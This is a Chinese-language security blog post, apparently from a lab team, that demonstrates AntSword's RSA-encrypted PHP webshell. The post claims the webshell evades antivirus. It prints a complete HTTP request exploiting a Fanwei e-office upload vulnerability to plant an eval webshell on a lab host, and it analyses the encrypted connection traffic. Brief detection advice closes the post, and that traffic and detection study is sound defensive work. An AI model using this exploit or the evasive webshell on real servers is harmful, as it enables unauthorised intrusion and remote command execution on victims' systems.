close

網安引領時代,彌天點亮未來



0x00寫在前面

本次測試僅供學習使用,如若非法他用,與平台和本文作者無關,需自行負責!


0x01中國蟻劍

中國蟻劍是一款開源的跨平台網站管理工具,它主要面向於合法授權的滲透測試安全人員以及進行常規操作的網站管理員,流量使用編碼、解碼器進行混淆可繞過WAF、IDS等檢測系統,並且有多款實用插件靈活多樣,為安全測試人員帶來極大的便利,同時也受到很多人的青睞。

https://github.com/AntSwordProject/antSword



0x02生成RSA木馬

在線RSA生成網站

http://web.chacuo.net/netrsakeypair

生成公鑰和私鑰

AntSword v2.1.0版本開始,新增了PHP RSA編碼器,蟻劍內置了一個編碼器RSA模塊,使用了RSA非對稱加密進行傳輸,新建編碼器 -> RSA配置 -> 點擊生成公私鑰,然後配置公鑰、私鑰、PHP代碼,生成中國蟻劍連接專用webshell

編碼器設置

生成的webshell檢測是否免殺

D盾檢測(可檢測)

冰河webshell查殺(免殺)

火絨檢測(免殺)


0x03攻擊測試

通過泛微e-office漏洞上傳webshell

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection: closeAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348Content-Length: 1289Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4--e64bdf16c554bbc109cecef6451c26a4Content-Disposition: form-data; name="Filedata"; filename="test.php"Content-Type: image/jpeg<?php$cmd = @$_POST['ant'];$pk = <<<EOF-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxvJOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1eW0EArkolkjFKe8Y4DQIDAQAB-----END PUBLIC KEY-----EOF;$cmds = explode("|", $cmd);$pk = openssl_pkey_get_public($pk);$cmd = '';foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;}}eval($cmd);--e64bdf16c554bbc109cecef6451c26a4--

webshell連接地址

測試方式(編碼器RSA+解碼器default)

http://10.211.55.9:8082/images/logo/logo-eoffice.php

測試連接成功

配置http代理抓包分析連接流量

代理配置(也可以Wireshark抓包分析)

第一個交互數據包

編碼器RSA+解碼器default

編碼器RSA+解碼器base64

編碼器RSA+解碼器rot13

對請求數據進行url解碼、base64解碼發現數據為亂碼

通過分析編碼器,發現傳輸的數據是通過RSA公鑰進行加密,baas64編碼進行傳輸的,從而實現了對流量的免殺。

連接流量分析

1、Base64:

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194AContent-Length: 2810Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D%7CdhXaJmNV0FpVQrVFx6MsN5G%2Bxh9bdaSW5XGp%2FlP4wmB9oqAOFSbB66ONMkJjV6vBUzpLzkVxWu3CaqVwHobgHjCTpnqEtTzJ9PDLwznYDtiZeLwdeobxxJbS52L5kLFV4Q8Cs%2FGVJ3ZkmlZC0n5u0OL6Mz7oj5DpSJOxv76E3tY%3D%7CkmVlk8oig5gTjkdM0xwxLgWmICsSHgy52C4tOIHmQqW%2FJ7Th2k%2FalpjDcEXS5noQU4cGRum1zYYMyqb89feasu9FubYi872JIQWFTV1J90lwmRzesTnO1kbw%2BDDwYTZJFAqJv7oz5gzqCvtWayKwI5xC18DtJmaWGQ2pRB3h2js%3D%7CNHKMyZ5UX6GdF1aLhPgLlsx7cRILuWFgZ8LDzdFBAOjd3gsvlng0YDPYdPEgl6KEXQkOvDkRBq2vrRpDCCt2X7PjFxJxVhZQP%2FpjhEmcEp8lSJYNja6BTSSqRo3Z0TKa78rdeGwEJAAEg%2BLLKJearYOLalLqH12iaw%2BfcnY0XwI%3D%7CdAgPN66G8RP4J7KY935hmeMw12JG9QYNgLdxDwJ3JiMv4orLbq%2B5nOzH6VgXWgnUytZHtpaTf2FFr4KA3oZnSltLurBBvAXxuFiMcSr%2Bqg%2Fd1jDWI4mAsC8Z5Uz8TRBGmm1mcYNwE56u4ezW3Cjkf2nBmJmCkBUAOQQTvIW6zt0%3D%7CRbe5CDwSBZcic9Esr%2FeKg%2BJLii1A%2ByWJMGfaWrrp0%2BnXw4PYAGGT8IQHKzhdMF1GycKYPhKw4kV2szN%2FElP7rlP7gNMGxHhCGUOB%2FJlTwd4c2Z%2FHVfG4F0RLHfKqyIXii8UzRKvzicJVjk4tQV4VUuaaB%2BJqzRsfwJlh8ZxjJA0%3D%7CJ0GD%2F5W1bJCwfqWeJjRP7Crjfi5uwx%2FZh%2Bpq1pcbNtEtoqrc9J4tR27sWfVz9WY0oRVlZkajbUz9F%2B4nMe%2Fa5v%2FVEHYYjNRArOck9jrzQ9N9w%2F7qc%2FLtlR5Z%2BXgRAWw6HRI3SXQz7iI2Tr2yX%2Fc5uI7okY%2BrfwMClpXSuuHTEo8%3D%7CfohHb1C%2FzUJ77%2FIEAwmRISV%2BzsdeAygjtWPfb7XFDG3tfogdhGWxhyIm%2FgxwDbeW8%2B8qmGowryWHiGpSFc%2BdsflpoMVREYgreQAuuOKsccqVF%2B7O5hPj0wslH%2F8RXz99hu4M2RXxDGMKPi1Zjyt2xIeV0%2B0vVujqCoqj8JqaGnI%3D%7CDQBBTstRO9SvIktPWRtQPyD6qNX9Sb%2Fbyw4Err34XmvCo1pbYAqNdYzzngpKyx1ZnrH8fpHkhxEhkUiFiurfpqHiJQ6oVloYf90B%2FddykmZFkw4190%2B2rb0Hbw%2BSrduJEU7hWlKrMDqaG3Z8o8idVtbFXvihW4sM2qrKtXD5i1g%3D%7CMDHjjdGMDiHzsG94H340Z2VsjBceQ8YHaVx1SaslqoLMbTA9hov1EMTlYZm0Muy4jBin4i880UzrVBkxQBG%2F%2BeHP%2BToRLNilJZm6OJYMRdBTdSCR4qovem5W27HHaHUkZx%2BtcrvfKIA32GaFWymX3bGWHLBEe6z8xsFmqAhDjXQ%3D%7CNOGyWuBDmTeOBQmrAIdjUHR%2FfTXfW8eQSegmMwiDuOrNuETjirFOw6%2F1WwSev5CZ8jJKxMdc90o8rCXsqKl65wXzLyZuEcLWDVFb0Sdd06yr9W5D0Cec%2FyuYlxksHE9mzL%2F99uZsaCV4ETMIAHUl1IzoCwDKbNMWS6%2BuG0COlfs%3D%7CMgpQIzjmORFWFlnySqPz9TVXlg6LrZdZbWkdPDVx%2BU7zUzfcx3sAfPc7go90ketoIlFwqCa8xHf34Z7D0nPYV5n3c3GGO5IA0ASa%2Fark%2B9fPNYHQtx1H%2FjHmfrzJxnJY47BYXjkxlxx6qnszI%2FyVVDLgycd8VymeNZCRbsSF7ds%3D%7Cm7u0n8JL6%2BVeztHHYUwBwWCVuCb7V3xumKaLxKZpKqz7udyJxg36ZzCjnGu7hGmFbB2CFhl7LCk%2BCNRTniQM6AP0fXsYOYdQVLivY%2FeLSFN15dfUcjkgZGjMqejtIXdB2ovYqBIH%2FCsl1gjgwWLPX1jgLHwt23XvdZFhCEdqBik%3D%7CZS4P86VmcXviTY5mBBYs4HfEhMLBypZQ%2Fnh9aPkgiDonbEMAshMh%2BhHLVxPQhKvBoodun9SkOSnVKLKdcbR%2BEFdlRkEpEC42SVxQqFKV2fPaRlYDA8%2BeXsH07WE9MLg3laVgHFLI2BUs9r1yLMH6Cqsy79FJvacW%2FBDKX9Ql1uM%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:37 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 118Connection: closeContent-Type: text/html; charset=utf-8721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472

2、chr

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36Content-Length: 2840Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cnmv4HxDpKTfWcvCqOORZ0ccm%2FhpNNQ7XJGJPMdKx3G2xojU7C%2BKaOEBqVPPMrYJRRdVPWApUj2fSAPEeCQi87TeFm78adpzbtZmrYta7TQYFROF3UFv0hMgBvQw6ONutQntgE0GaCFRVqVC6b6ZqkUJUvHM8B8Zu9FKPzngUwlU%3D%7ChrQwyxH9%2FJx6LFT0VNv0cSd%2Ff2yzVw%2BOJiclxUKcEhV8q%2FM1Tx0Zx%2FNizuGpB%2FmmNBfzeMffSZkMxeWEtEYQK%2F4in1rK4T3RF1nZ06cneuI45rD1959C2mLSjVul0AKaFvZSTW0vL5laM4rYl1BHBhWblgVcbUWi5B6dRnk%2BjCE%3D%7CnevocVhkYRoAcVraHcND49w%2FGgpYxQM4jc1n8J%2FHrEfjNnbJmCKabgsFUb2TGmv5i0n%2FfLzTSQ%2FBo1kBztiWU4pTSBJ3iv2UBhPMG9LEB9xH%2FbkQWIa2ePIr56YWmvfN6fXy1F6lW7T7%2F4FIE%2F4DDb4jgwUncWFA504ogCNLW7E%3D%7Cdl1Wo3bpS5Elt0Q2bonJZmPJAioe3g3s%2Fx%2FfK%2F8UtCXzUhhY3kxKJb9itP%2BbPbrrbUY6lAdl13G0BE%2F2SdtFiD0Kx9b4RN30r6l8jsuJla7uc01LX%2BHjBcojGdIYr23P%2FSzZBHVffNCSljfTJbYlDO5sPJ%2FgmoBtJOLEoP0Hi70%3D%7CBTj0kRvK6GPmDn0uEm%2Fm8F3%2BsxItr1h4hR3zdVa1VF%2B%2FNXUqS3uBETvN9qPLWhGUBZfMdL1j3Vjv7vMqNQBZuxqZ2Z0irD1AWzjQrI5gaZOi0mICY67eJKWeY95udeharJ5tPVaQv9Id1jeLEKk1H2r0acEpUGpCJWtCPX%2BIWBI%3D%7CiwHLtTeNpssZ%2BLjVBEBZuNzpFkPFSRlhhzLu29D7aT%2FHRz%2BBtgT8sZuPTGJnEC6QXo0hhEzHLtZ%2BVnvGqGPGt0pNi3eGBy%2FLdAdXtigPepjtLv0EAETm%2FmJvGfgrPhM0yRAQz9AGky%2BltYhoU4uVPsWBUDR7owEZKotewpiym7k%3D%7CVLoJK05GULezBTpPlin%2FUuWZnZXg%2BFkzCUqB5eAvjiUYb6SMZPUvnI9L1KBQcJnpaT81t5O3GRufjybWYv8Y359IgxluNh6WajnkcFWXZnTAowH%2FOH8Was%2BQ9C3XCOX7kkJQEbWS7ifS%2BZJ76sfnDScEblc5iaD4jLn43isa9vE%3D%7CbPwMmWNCNQbhqma%2FLEtS18P9eLlPU4tOt3BBQb%2FwGriS9Qo%2FvDCgsb6FDkVpr27U807dvKa7ybpReM1%2FWuXVpTIFs6UeV9Tt0U6o8Edr5c5cOyYHY%2BHk0Q6%2FY8hxaWxi8GSXqlLBU3tXk817APkZq55Gdgzvha%2F6xR24K5LUW68%3D%7CTa8OgzCIJ8M39TVsfYIjfCqfgnbJU2eEFCHE1QcxeCCj78khr2hl3971WnDpiFRcvqGrHJJg2nb%2FfWf%2BhGVRuixitEktqdDf612Jg%2BZyYe40TZI%2F4AUpGjX17TNdVAjNRW4U8vL89p3%2BYwcLQyjCUgSsEsiSfOoqJOQOZcRpv4I%3D%7CA8vIoVGO2xL1mrc9GyqXBfrflBO6fsYMoZuyqYQLtdOaLxPbQlcXAPThxjizMdKeKTV0Vz8Ia9x7a6Kdz%2F928YeE6OqyNlord1aCy%2BHKRYlPnn7waenQnhkNke283xdnK5rcH7u5YmAgbcAqttNmI13jNMeTcgDIIvF7hBXsz14%3D%7CHmDv190rZS9yiVLSTLvquni0hNxuGPM%2BjUgko3n4yy2NyrYd38qmD6fXdMwE%2B2sqx9ihwnLSVRF%2FjJ8y%2B2w0JjHpzHwqtNXgAXEppAAKHrFLPvFIU%2BJ8LaqnZu%2FAZKp%2Bucb2KbpNkeOx8bjH5yk0v7qc%2BsKvvvjifHtNaIOd0us%3D%7CMnW67HYNEpuFHTxLbP3pR4AsckEbsGB03bS2fYGndibUuILPvqdsdbuU6rdrKTAZluKY%2BeFstXEgLKPK%2F4rWhPou%2FsyO%2ForB%2BnwbaKRmsSHaIdb6rH6GrmWg5wUzoliKi5iiUb4tk5wyE46MsRGmaAweg1bpCvUWlCF6GKc8ekA%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:40 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 91Connection: closeContent-Type: text/html; charset=utf-84629930P:/rbssvpr/jroebbg/vzntrf/ybtb P:Q: Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601 FLFGRZa9b886

3、default

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Content-Length: 2828Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cbrg6%2BKZM7B3qYLLGppGHJ1q7yCTBr3Z6pGLX0LL87I2pQD%2BzHLt1amHKmgeQ0cEA2Y9Wp3ae11u9%2FFGcxL3YScRGu8r043fdD%2BqbSOivWbbVPbUfVv1rLCtNXyqXudWxlGJ9ACID%2Fa0ibhzyaMv9v11IupPPHXiMlPL6rw7P05k%3D%7CTyo5lbtjtq5GT3KcoNqbuL4b%2Fm4paol7bahEj%2Bas5GzKu%2BQu3M1Vm3TpSnPiTfE9xRtlvPFj8nnNnPJ%2FW1HFuDMxYw4hpcSWSQq%2FyrSEfAG1oMHDHsOj5VZE6OkHnkR%2BJv9MBDHBCrPPfLkMODATBPT2gN%2BMVNgiyIkQWmHeaSI%3D%7CekPxfn%2FJQweaqz9RdL2Xx7AyBznz3eNqY2KWCnFX3fuR2McHrvrtl2MVXgKogqQrhfFa96Ee%2B1EaJYwzk%2FcxUV0%2FzUE5YWbQFZQuH3znmR0Jd33aVZrvhDMtD23xsLw6BhaMOtQ8k8Ieoi5lt7GjDIiAAThFsSXnSXL%2Fydy15YI%3D%7Ci6C2yHJJ%2BENE%2BYAb%2F1DarE4I3Vvnz2MvVeI%2B4PH6xNKEkGNWL1dxuit7OBprlU4zF7H4r4TMTGP9dsl6eSEOL14W%2Fh888UKTVQb6h5wafxkekR6SNqMvWGdQ010UNgqZ%2BD4h5zJgFEsJc293y8ORS%2FNUpcOzqWuL2DE91SbvhPI%3D%7CAJNFE62mMKRdrNqeZQwIzsrKmnZir%2FC3nh2LF4zHhpLml%2BrEROR6pxq8VoxEyOJ4HqBokufQaXcTbliLpqdKBLXawRMoFLxB%2FcUEgnPH6QnTcGp2o4dIQyNzkC6imdYaKsTGHMMMzpcbnk1Mm2bmJu%2FH9KdAJ2RFHoWqwQm1Ox8%3D%7CRWtP1JCbFMwbB7AJkUoSoostVOcASOo65xFis3HlwhJEWPgeRFMZ7J%2Fxlalobf26%2BGn3KqG69Wou%2BkMEyULuE6UqWzVBCTvU7ZNxybEApDKkD4AJRukbdhm47MpdiGblkHrqZUvMP4Q6XrJ78a93F1qZpzulGbEBKEC2dvaudEs%3D%7Cj%2FOjvw1xVxaA4jBBbpKI%2FW1TqccJnkSa3KunBHn3Kr8lYMGS8bUSlN1HryluZQcdjn6%2B44JKhYmTqXsgmyxGCjAehNgZ1RhPDJSAx9%2FJrMbxTmXWNQjMiYIgISIHIMmwrgc4HflRmzx3XG3ArVCJbKPb1EbgJ6kFVRJKSrmvYuw%3D%7CUV%2BfJc43%2FEH02EQDYkQ%2BU8rx6CKtkkQcKLJufm%2B7zKxUjuwEeYI9pKCDXfxQCw3pgakeH3qxBMLA5iJBtp1kQgMXwqrjRxOmq37vqdEXE7NRbDXzSReD4I9Rn860ACvhqEuIHmxSuTR7QlDcmd%2Bhu2Q5jR0yMIlwEEkyIkAIef0%3D%7CeDVGOZ%2FbXT7Yt0bddjGpbAW6WCwd3f0szgeT0zLQH%2BGaRpTaHR1qzgKlJ1HdQAWLZKlTkeghqtgvTSWJdmPZXkCLVnuf3pDcWlkNWLAiIAWJGcjRu5WyZyyDQBUQuI%2FHinSIs01P2RygKyGxMdG6QfKCgEZzjw7e3f%2FkMR%2Bu4YQ%3D%7CZDF%2FGyXt35XIuWB9U9U6aIzYU3g2yIsmmAlHeWF8E5yjwKCE5Zt7fpzoh1ouDK%2B21lRIVz9QFjQHTq8EZw%2FVfLiONMC9Jq1Ju%2FTH%2F1Suwlyf%2Bwa914vs1Z0r%2Bh8udvkU%2FkweuaVoNGmp30VlU%2FW9XC%2B93DN%2F67FE%2BidxUXA5O%2B4%3D%7Cg4f7XkR0Mf8PqCpKoVekbCAKw582AiYfHhpLGo3XASJ9SEMzub5FuOrw7cd7UVUXXQHqkayiHyUh2kq%2BV7WiLtei9Sq92fp9xVWN32J8voiGsfEnBm1lPcwZbmFSa0vhzdrVmxphOarJg2wFrpYlcpY58GmlFNCwCnam52J1q9Q%3D%7CH8oR66x2cJmVBtkyuAYeFyrsqPcSSRSXCymHKK2Tbt%2FquUXV1uFmewppEt%2Fw2UDb7ARQNXXOEhCAYAyzlZaYSvWBUwejUoLIR5wzwjAzVZpIxe8xZQSfnrEjNd7aM6Fp%2FYJgwa7wSpcKeIQ%2BkUslFpEv53StQycn6hV9pJl4WXc%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:34 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 92Connection: closeContent-Type: text/html; charset=utf-8a96ed3a93C:/eoffice/webroot/images/logoC:D:WindowsNTYUNZUI-PC6.1build7601SYSTEM690a7


0x04檢測建議

中國蟻劍工具從設計和使用角度加入了很多攻防對抗的思考。以下為三點檢測建議:

第一,從從攻擊入口檢測RSA木馬的上傳,可以使用靜態檢測規則或者沙箱或webshell查殺引擎進行。(流量、行為等)

第二,檢測中國蟻劍工具在流量測的強特徵,具體可以從上述分析中研究提取。

第三,通過威脅狩獵進行全方位監控,發現異常進行全流量回溯,從而定位攻擊。



知識分享完了

喜歡別忘了關注我們哦~

學海浩茫,
予以風動,
必降彌天之潤!

彌 天

安全實驗室

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 鑽石舞台 的頭像
    鑽石舞台

    鑽石舞台

    鑽石舞台 發表在 痞客邦 留言(0) 人氣()